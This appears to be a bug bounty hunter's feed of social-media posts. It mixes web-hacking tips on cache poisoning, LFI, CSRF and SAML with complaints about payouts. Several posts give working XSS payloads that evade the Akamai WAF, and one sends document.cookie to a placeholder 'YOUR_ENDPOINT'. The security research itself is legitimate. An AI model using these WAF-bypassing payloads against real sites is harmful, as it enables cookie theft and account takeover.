Stored XSS via cache poisoning 🧪
the Akamai WAF really annoyed me, but the craft of this payload defeated it :
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
#bugbountytips
#BugBounty
#Hacking
instead of heading towards what everyone else is looking for, explore a vulnerability that you like
dive deep into the topic, invest, set up a small lab and look for specific cases or recurring vulnerabilities in any software
It might take a while but your efforts will be worth it
research => interesting discovery => pattern recovery + template creation => axiom + nuclei => mass scan (BB programs) => double check and report
Ramadan mubaarak to all Muslims, take advantage of this month to get back to essential things!
#BugBounty
1. Identify a URL param allowing a potential LFI
2. FUZZ the param value (GPT can help create a custom list)
3. Find a new file/page via LFI
4. FUZZ looking for URL params reflected on this newly discovered file
(...) ⬇️
#bugbountytips
#Hacking
the cooking continues wal hamduliLlah, here are some of the dishes
the "bypass" used for the last report sent is very interesting, curious to see if other assets are impacted
#BugBounty
1. Self-XSS on the personal information side
2. Search for a CSRF on the vector in question but nothing on the web app side
3. Discovery of an old endpoint on the mobile app vulnerable to CSRF
(...) ⬇️
#bugbountytip
#BugBounty
moved my writeups to a personal blog and took the opportunity to write a little on a discovery inspired by shubs' last talk on WAF bypasses
so, while waiting for the next articles on my recent 0d:
WAF as a weapon and DOS as a bullet
#infosecurity
Yay, I was awarded a $2,000 bounty on @Hacker0x01!
#TogetherWeHitHarder
the BB is also that, sometimes we come across self-respecting companies that make sure to be fair and it's frankly pleasant
The hunt was good tonight al hamduliLlah
If during a cache poisoning attempt the X-Http-Method-Override header is taken into account by the server (and the response cached), take the time to test all HTTP verbs; you might find some interesting behaviors
#bugbountytips
#BugBounty
Be careful when testing for cache poisoning, it is rare but sometimes URL parameters are not included in the cache key.
This means that even if you add a parameter to poison the cache, the param will not act as a cache buster (...)
⬇️
#bugbountytips
Yay, I was awarded a $1050 + $500 bounty on @Hacker0x01!
beyond exposing the amounts of these two not exceptional bounties, it has been two times in a row -diff programs- that I have almost seen my bounty halved
so “move on” yea but not too quickly either
The javascript code sometimes contains treasures, read it!
Developers sometimes provide certain URL parameters during development that they abandon during production.
When this is the case it is rarely properly sanitized
#BugBounty
#bugbountytips
a first for me on @immunefi!
"soon" an article on a little research that I did, allowing me to find more than 60 vulnerable assets (for the moment)
#BugBounty
#Hacking
Take a look at my new write-up: "DOS via cache poisoning" covering some of my findings. 🧪
I briefly explain how a cache works and how this vulnerability is possible, good reading!
#bugbountytips
#bugbountytip
#bugbounty
#infosec
bug bounty mafia ep. 2342952:
from a $2500 to a $750 bounty and always the same fairy tales to justify themselves;
beyond exposing my case and seeking justice by tagging the entire H1 team in my post, when can we expect a stricter system for companies?
#BugBounty
we are a for profit company that generates a lot of money and we invite you to our private VDP program so you can work for us for free, so, happy? (please say yes)
I clearly indicated in my settings that I am not a volunteer, curious to know how they managed to get through
hey @jobertabma, @scarybeasts
useful feature: be notified when the original report of a duplicate is resolved (or when adding/decreasing rep points indirectly)
this isn't the first time that one of my dup reports is still valid after the original report has been resolved... ⬇️
small battles to bypass WAFs are always a pleasure
by the way if someone needs help and wants to collaborate, Akam@i bypass (XSS) available
#BugBounty
#infosecurity
I have access to an AEM via path traversal & after a long time digging, nothing juicy
The interesting endpoints require changing the HTTP verb, which is impossible for me -> path traversal via server-side parameter pollution
An AEM expert to inspire me before I abandon this vector forever?
#bugbounty
10.12.22 - Submission
11.12.22 - Internal disc. with the sec team
23.01.23 - Start of mediation
20.02.23 - Needs more info (= vulnerability patched by the Alibaba team and therefore not reproducible)
15.08.23 - Resolved (without bounty of course)
#BugBounty
#hackerone
#infosec
🏴☠️New write-up on a recently found vulnerability, titled: "A web cache deception chained to a CSRF, the recipe"
Don't hesitate to take a look!
#bugbountytip
#bugbountytips
#Hacking
Some sites do not have the same features/technologies depending on the region chosen; this is often aimed at providing a more relevant UX adapted to the specific needs of each region
And it may be that a fix is deployed in some countries but not others
/fr/ fix
/sg/ still
#bugbountytips
For those who asked me how to make a payload - bypassing the Akamai WAF - for a blind XSS, or simply to retrieve cookies to its endpoint :
"><input autofocus nope="%26quot;x%26quot;"onfocus="frames.location='YOUR_ENDPOINT?c='+Reflect.get(document,'coo'+'kie')">
#bugbountytips
Context: XSS to account takeover.
"For any reflected XSS, Confidentiality is always None"
What do you think? Is he right? If yes, why?
#bugbounty
#infosec
#hackerone
Lumberjack Payload 🪓
After a long battle (blacklisted keywords, prohibited parentheses, different types of simple apostrophes..) I got it.
-> #javascript:whatever you want() in the URL hash
-> frames["loca"+"tion"]=frames.location.hash[1]+....
#bugbountytips
#BugBountytip
⬇️
Hi @Hacker0x01, if a company decides to literally ghost a researcher and fix the bug a few months later, is that really possible? Customers are king okay, but at this point?
Not a single message from the security team in 6 months despite two mediations 🫠
#BugBounty
#hackerone
I was able to exploit similar behavior via a GET req this time:
the value of several URL params were returned by the server then all put together in a cookie
by dividing a payload normally blocked by the WAF into 3 and placing each part as a value of a param (...)
#bugbounty
Latest episode is live and this week we've got a tool drop!
@Rhynorater put together a script and Caido extension which coordinates with @DanielMiessler's Fabric to help automate BBP report writing.
Also, lots of reporting tips! Enjoy!
Thank you for the gifts @Hacker0x01
Currently at +780 rep points on #HackerOne, having only worked on paid programs, free work for for-profit companies not being my thing.
Nothing crazy, have to keep trying hard hoping that the continuity will be exponential -in shaa Allah-☝🏼
If you manage to cache - via any extension - a 404 response (error being caused by the addition of your extension), make sure that no confidential information is present in the source code when you are connected to an account. 🧪
#bugbountytips
#bugbountytip
#infosec
Little #bugbountytip
HTMLi in an email template to ATO?
When we have a code inj in an email template we report it as HTMLi since it is not possible to execute JS in the different email clients
Sometimes a link is provided in the email to view it in the browser > JS triggers > XSS
hey @Ice3man543,
description/CVE is incorrect here, the vuln linked to the invoke header is not linked to CVE-2023-46298 [1], I did not get a CVE as explained in my research
if you create an exclusive template for the invoke header remember to put my article [2] in ref, thanks!
it's okay not to master a subject, but in this case you have to ask and not act hastily
it's like saying about an RCE POC, that the "id" command is not sensitive and that it is therefore not a vuln..
we have an adage which says: "science (knowledge) before words and actions!"
Same thing without user interaction :
"><input autofocus nope="%26quot;x%26quot;"onfocus="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
when I search for vulnerabilities via techniques and/or discoveries on a particular subject my duplicate rate is 0%
the beaten path has its limits, the competition is tough, don't be a skid, easy money doesn't exist -almost-
enjoy and be curious (sry for the linkedin aura)
Craft, XSS and ATO
After some research, I came across a POST request in my proxy which -for some reasons- caught my attention. The server was returning data in JSON format, I retrieved the parameters passed via POST then transmitted them via a GET request (...)
#bugbountytips
Improper config of SAML allows the use of the relayState param to redirect the user to an endpoint owned by the attacker
The redirect is done via a POST by which it returns the SAML resp after auth
The value of the SAML resp can then be exchanged for an access_token
#bugbountytip
⬇️
nice bypass, without parentheses or template strings, I had fun!
if anyone needs help and wants to collaborate, Cloudfl@re bypass (XSS) available (Akam@i still available)
#bugbounty
#Hacking
lately I've seen quite a few posts from hunters blocked by WAFs asking for help to transform their HTMLi into XSS
guys, it's my guilty pleasure don't hesitate
WAFs tend to let me pass
always available for this kind of little #bugbounty collabs